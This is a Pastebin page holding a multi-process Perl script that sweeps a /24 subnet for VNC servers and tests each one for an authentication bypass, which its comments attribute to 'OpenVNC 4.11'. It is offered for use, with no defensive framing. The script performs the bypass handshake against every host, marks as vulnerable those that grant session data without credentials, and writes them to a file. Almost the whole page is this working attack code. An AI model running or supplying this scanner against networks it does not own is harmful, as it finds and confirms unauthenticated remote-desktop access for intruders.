SHARE
TWEET

Upload script perl VNC Vuln scanner

choirurrizal Dec 7th, 2016 (edited) 321 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  #!/usr/bin/perl
  2. # Multi-threaded scan for OpenVNC 4.11 authentication bypass.
  3.  
  4. use strict; # why not?
  5. use warnings;
  6. use IO::Socket;
  7. use threads;
  8. use threads::shared;
  9. use Errno qw(EAGAIN);
  10.  
  11. # Configuration variables
  12. use constant VNC_PORT => 5900;
  13. my $splits = 5; # Creates 2^N processes.
  14. my $avg_time = 5; # Tweak this to get better time estimates.
  15. our $subnet;
  16.  
  17. our @results : shared;
  18. our $todo = 0;
  19. my $orig_thread = "yes";
  20. my $start;
  21. my $end;
  22. my $time_estimate;
  23. my $elapsed = time;
  24. my $out_file;
  25.  
  26. ++$|; # To watch as the results come in, in real time.
  27. $subnet = $ARGV[0] || ""; # Get subnet from command line, else ask for it.
  28.  
  29. while (1) {
  30. last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/;
  31. print "\nWhat subnet do you want to scan? ";
  32. chomp($subnet = <STDIN>);
  33. print "That does not look right. Enter something like 192.168.1.*\n\n";
  34. }
  35.  
  36. # Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
  37. $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
  38. $subnet .= ".";
  39.  
  40. $out_file = "VNC_" . $subnet . "txt";
  41.  
  42. # Mostly a guesstimate
  43. $time_estimate = $avg_time * (256 / (2**$splits));
  44. $time_estimate = int ($time_estimate / 60);
  45. $time_estimate += 4;
  46.  
  47. print "\nScanning subnet ${subnet}x -- this should take approximately
  48. $time_estimate minute(s).\n";
  49. print "[!] = Vulnerable, [*] = Safe, [.] = No response.\n\n";
  50.  
  51. CHECK: {
  52. unless ($splits >= 0 && $splits <= 8) {
  53. die "ERROR: Do not split $splits times--that makes no sense.\n";
  54. }
  55.  
  56. unless ($splits <= 5) {
  57. warn "Reduce the number of splits from $splits to 5 or less if you
  58. get memory errors.\n\n";
  59. }
  60. }
  61.  
  62. # Ugly, but this works.
  63. DivideWork() if $splits >= 1;
  64. DivideWork() if $splits >= 2;
  65. DivideWork() if $splits >= 3;
  66. DivideWork() if $splits >= 4;
  67. DivideWork() if $splits >= 5;
  68. DivideWork() if $splits >= 6;
  69. DivideWork() if $splits >= 7;
  70. DivideWork() if $splits >= 8;
  71.  
  72. # Which IPs this thread scans.
  73. $start = $todo << (8 - $splits);
  74. $end = $start + (256 / (2**$splits)) - 1;
  75.  
  76. foreach ($start .. $end) {
  77. Scan_VNC($_);
  78. }
  79.  
  80. wait until $?; # Wait for children to finish.
  81. exit unless $orig_thread eq "yes";
  82.  
  83. # Only the original parent thread will continue.
  84.  
  85. $elapsed = time - $elapsed;
  86. $elapsed /= 60;
  87. $elapsed = int $elapsed;
  88.  
  89. print "\n\nFinished scanning ${subnet}x in $elapsed minute(s).\n";
  90.  
  91. SaveData();
  92.  
  93. exit;
  94.  
  95. ####################################
  96.  
  97. sub DivideWork {
  98. my $pid;
  99.  
  100. FORK: {
  101. $todo *= 2;
  102. if ($pid = fork) {
  103. # Parent
  104. ++$todo;
  105.  
  106. } elsif (defined $pid) {
  107. # Child
  108. $orig_thread = "no";
  109.  
  110. } elsif ($! == EAGAIN) {
  111. # Recoverable forking error.
  112. sleep 7;
  113. redo FORK;
  114.  
  115. } else {
  116. # Unable to fork.
  117. die "Unable to fork: $!\n";
  118.  
  119. }
  120. }
  121. }
  122.  
  123. sub SaveData {
  124. my $vulns = 0;
  125. open(FOUND, ">", $out_file) or die "Cannot open $out_file -- $!";
  126.  
  127. foreach my $IP (1..254) {
  128. my $record;
  129. $record = $results[$IP];
  130.  
  131. unless ($record =~ m/not vulnerable/io) {
  132. ++$vulns;
  133. print FOUND $record;
  134. }
  135. }
  136.  
  137. print FOUND "\nVulnerabilites found: $vulns";
  138. close(FOUND) or die "Cannot close $out_file -- $!";
  139.  
  140. print "Data saved to ${out_file}\n\n";
  141. }
  142.  
  143. sub Scan_VNC {
  144. # Scan for OpenVNC 4.11 authentication bypass.
  145.  
  146. my $hostnum = shift;
  147. my $host = $subnet . $hostnum;
  148. my $sock;
  149. my $proto_ver;
  150. my $ignored;
  151. my $auth_type;
  152. my $sec_types;
  153. my $vnc_data;
  154.  
  155. $host or die("ERROR: no host passed to Scan_VNC.\n");
  156.  
  157. # The host numbers .0 and .255 are reserved; ignore them.
  158. if ($hostnum <= 0 or $hostnum >= 255) { return; }
  159.  
  160. # Format things nicely--that crazy formula just adds spaces.
  161. $results[$hostnum] = "$host";
  162. $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
  163.  
  164. unless ($sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => VNC_PORT, Proto => 'tcp',)) {
  165. $results[$hostnum] .= "Not vulnerable, no response.\n";
  166. print ".";
  167. return;
  168. }
  169.  
  170. # Negotiate protocol version.
  171. $sock->read($proto_ver, 12);
  172. print $sock $proto_ver;
  173.  
  174. # Get supported security types and ignore them.
  175. $sock->read($sec_types, 1);
  176. $sock->read($ignored, unpack('C', $sec_types));
  177.  
  178. # Claim that we only support no authentication.
  179. print $sock "\x01";
  180.  
  181. # We should get "0000" back, indicating that they won't fall back to no authentication.
  182. $sock->read($auth_type, 4);
  183. if (unpack('I', $auth_type)) {
  184. $results[$hostnum] .= "Not vulnerable, refused to support
  185. authentication type.\n";
  186. print "*";
  187. close($sock);
  188. return;
  189. }
  190.  
  191. # Client initialize.
  192. print $sock "\x01";
  193.  
  194. # If the server starts sending data, we're in.
  195. $sock->read($vnc_data, 4);
  196.  
  197. if (unpack('I', $vnc_data)) {
  198. $results[$hostnum] .= "VULNERABLE! $proto_ver\n";
  199. print "!";
  200. } else {
  201. $results[$hostnum] .= "Not vulnerable, did not send data.\n";
  202. print "*";
  203. }
  204.  
  205. close($sock);
  206. return;
  207. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top